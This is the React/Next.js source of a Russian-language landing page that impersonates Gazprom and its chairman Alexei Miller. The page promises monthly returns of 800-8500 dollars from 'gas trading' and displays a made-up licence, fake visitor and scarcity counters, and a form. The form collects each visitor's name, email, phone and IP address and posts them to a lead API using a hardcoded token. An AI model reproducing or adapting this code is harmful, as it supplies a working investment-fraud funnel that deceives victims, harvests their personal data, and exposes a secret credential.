import type { NextPage } from 'next';
import Head from 'next/head';
import Image from 'next/image';
import styles from '../styles/Main.module.scss';

import ReactPlayer from 'react-player/lazy';
import SliderWidget from '../components/SliderWidget/SliderWidget';

import ImageGallery from 'react-image-gallery';
import 'react-image-gallery/styles/css/image-gallery.css';
import MainForm from '../components/MainFrom/MainForm';
import Partners from '../components/Partners/Partners';
import SubmitButton from '../components/SubmitButton/SubmitButton';
import {
  profitablyItems,
  todoList,
  projectList,
  images,
} from '../apis/MainPageApi.js';
import Counter from '../components/Counter/Counter';
import { useEffect, useState } from 'react';
import { TValidateFields } from '../components/MainFrom/@types';
import axios from 'axios';

const Home: NextPage = () => {
  const [name, setName] = useState('');
  const [lastName, setlastName] = useState('');
  const [email, setEmail] = useState('');
  const [fullPhone, setFullPhone] = useState('');
  const [ip, setIP] = useState('');

  const fullData = {
    name,
    lastName,
    email,
    fullPhone,
  };

  const sendData = async (event: React.FormEvent<HTMLFormElement>) => {
    event.preventDefault();
    try {
      const { data } = await axios({
        method: 'post',
        url: '/api/v3/integration?api_token=DrBh7gRtMIeAqdBKbwGim9On8fA3wNH8u3fiJ0s3OKbVGKjlSTPhJGhggFvU',
        data: {
          link_id: 1990,
          fname: `${name}`,
          email: `${email}`,
          fullphone: `${fullPhone}`,
          lname: `${lastName}`,
          source: `gaz-invest.app`,
          ip: `${ip}`,
          domain: `gaz-invest.app`,
        },
      });

      setName('');
      setlastName('');
      setEmail('');
      setFullPhone('');
    } catch (error) {}
  };

  /**Validate inputs in form */
  const validateField = (props: TValidateFields) => {
    const { name, value } = props;
    switch (name) {
      case 'name':
        if (/[^a-zA-Z]/.test(value)) {
          return;
        }
        setName(value);
        break;
      case 'lastName':
        if (/[^a-zA-Z]/.test(value)) {
          return;
        }
        setlastName(value);
        break;
      case 'email':
        setEmail(value);
        break;
      case 'fullPhone':
        /**Testing Only Number with one + */
        if (/[^+0-9]/.test(value) || /^\+.*?\+/.test(value)) {
          return;
        }

        /**If namber dont have + in start string */
        if (/^[^\+]/.test(value)) {
          return setFullPhone('+' + value);
        }
        setFullPhone(value);
        break;
    }
  };

  /**GET CLIENT IP */
  useEffect(() => {
    const getIP = async () => {
      const { data } = await axios({
        method: 'GET',
        url: 'https://ip.nf/me.json',
      });
      setIP(data.ip.ip);
    };

    getIP();
  }, []);

  return (
    <div className={styles.background}>
      <Head>
        <title>Газпром-Инвест Официальный сайт</title>
        <meta name="description" content="Generated by create next app" />
        <link rel="icon" href="/images/header/logo.png" />
      </Head>

      <header className={styles.header}>
        <div className={styles.container}>
          <div className={styles.headerImgs}>
            <Image
              src="/images/header/logo.png"
              width="114"
              height="56"
              alt="logo"
            />
            <Image
              src="/images/header/rus.png"
              width="128"
              height="44"
              alt="rus"
            />
          </div>
        </div>
      </header>

      <div className={styles.fixedElements}>
        <div className={styles.peoplesOnSite}>
          <Counter />
          <br />
          ЧЕЛОВЕК НА СТРАНИЦЕ
        </div>
        <div className={styles.peoplesOnSite}>
          14
          <br />
          СВОБОДНЫХ МЕСТ
        </div>
      </div>

      <main className={styles.main}>
        <div className={styles.container}>
          <h1 className={styles.mainTitle}>
            Газпром разрешил жителям России торговать газом
          </h1>
          <p className={styles.mainSubTitle}>
            Теперь национальные ресурсы в ваших руках!
          </p>
          <div className={styles.mainBlock}>
            <div>
              <ReactPlayer
                className={styles.video}
                width="100%"
                height="auto"
                url="/videos/video.mp4"
                controls
              />
            </div>
            <MainForm
              sendData={sendData}
              fullData={fullData}
              validateField={validateField}
            />
          </div>
          <div className={styles.howToStart}>
            <div className={styles.profitably}>
              <h3>Почему это выгодно для обычных граждан</h3>
              <ul className={styles.profitablyList}>
                {profitablyItems.map((item, index) => {
                  return (
                    <li key={index}>
                      <div className={styles.profitablyImage}>
                        <Image
                          src={item.img}
                          width="53"
                          height="53"
                          alt={item.name}
                        />
                      </div>
                      {item.name}
                    </li>
                  );
                })}
              </ul>
            </div>
            <div className={styles.needTodo}>
              <h3>
                Что нужно сделать, чтобы начать зарабатывать c Газпром уже
                сейчас?
              </h3>
              <ul className={styles.needTodoList}>
                {todoList.map((item, index) => {
                  return (
                    <li key={index}>
                      <span className={styles.line}></span>
                      {item.name}
                    </li>
                  );
                })}
              </ul>
            </div>
          </div>
          <div className={styles.millerBlock}>
            <div className={styles.aboutMiller}>
              <h4>Алексей Миллер</h4>
              <span>
                председатель правления совета директоров ПАО «Газпром»
              </span>
              <div className={styles.millerTextBlock}>
                <p>
                  Мы приняли решение открыть доступ для инвестиций от всех
                  граждан, поскольку это будет выгодно как для Газпрома, так и
                  для жителей России.
                </p>
                <p>
                  Дело в том, что на данный момент российский газ становится
                  самым востребованным на мировом рынке. Во всех странах мира
                  стремительно растет спрос на его покупку. По этой причине мы
                  решили увеличить объемы производства газа в 4 раза и привлечь
                  людей со всего России в качестве инвесторов.
                </p>
                <p>
                  Поскольку цены на газ сейчас быстро меняются, все, кто
                  инвестирует в проекты Газпрома, получает в среднем по 800-8500
                  долларов дохода ежемесячно.
                </p>
              </div>
              <SubmitButton text={'Подать заявку'} link url={'#form'} />
            </div>
            <div className={styles.millerImage}>
              <Image
                src="/images/photo.jpg"
                width={738}
                height={808}
                layout="responsive"
                alt="Алексей Миллер"
              />
            </div>
          </div>
        </div>
        <div className={styles.calculatorBLock}>
          <div className={styles.container}>
            <div className={styles.calculator}>
              <SliderWidget />
            </div>
          </div>
        </div>
        <div className={styles.container}>
          <div className={styles.license}>
            <h2>
              Лицензия профессионального участника рынка ценных бумаг
              «Газпром-Инвест»
            </h2>
            <p>
              Лицензия №045-13980-02000 От 13.12.2019 Профессиональной и
              биржевой деятельности по ценным бумагам ПАО `Государственная
              платформа Газпром`
            </p>
            <div className={styles.imageGalleryWrap}>
              <ImageGallery items={images} />
            </div>
          </div>
        </div>
        <div className={styles.projectsBlock}>
          <h3>Проекты Газпрома, открытые для участия</h3>
          <ul className={styles.projectsList}>
            {projectList.map((item, index) => {
              return (
                <li
                  key={index}
                  style={{
                    background: `url(${item.bgc})`,
                    backgroundSize: 'cover',
                    backgroundPosition: 'center',
                    backgroundRepeat: 'no-repeat',
                  }}
                >
                  <div className={styles.backgroundShadow}>
                    <h4>{item.name}</h4>
                    <span>{item.subtitle}</span>
                    <p>{item.descrition}</p>
                    <div className={styles.SubmitButtonProjects}>
                      <SubmitButton text={'Подать заявку'} link url={'#form'} />
                    </div>
                  </div>
                </li>
              );
            })}
          </ul>
        </div>
        <div className={styles.container}>
          <Partners />
        </div>
        <div className={styles.mainFormBlock}>
          <div className={styles.container}>
            <div className={styles.mainForm}>
              <div className={styles.mainFormImg}>
                <Image
                  src="/images/header/logo.png"
                  layout="fixed"
                  objectFit="cover"
                  width="114"
                  height="56"
                  alt="logo"
                />
              </div>
              <MainForm
                sendData={sendData}
                fullData={fullData}
                validateField={validateField}
              />
            </div>
          </div>
        </div>
      </main>
      <footer className={styles.footer}>
        <div className={styles.container}>
          <span>
            *Все результаты работы в данной сфере индивидуальны и зависят от
            каждого клиента ПАО &quot;ГазПромИнвестинг&quot; ул. Тимура Фрунзе,
            д. 11, Москва, Россия, 119034, БЦ «Демидов» Политика
            конфиденциальности ©2018-2020 ГазПромИнвестинг
          </span>
        </div>
      </footer>
    </div>
  );
};

export default Home;
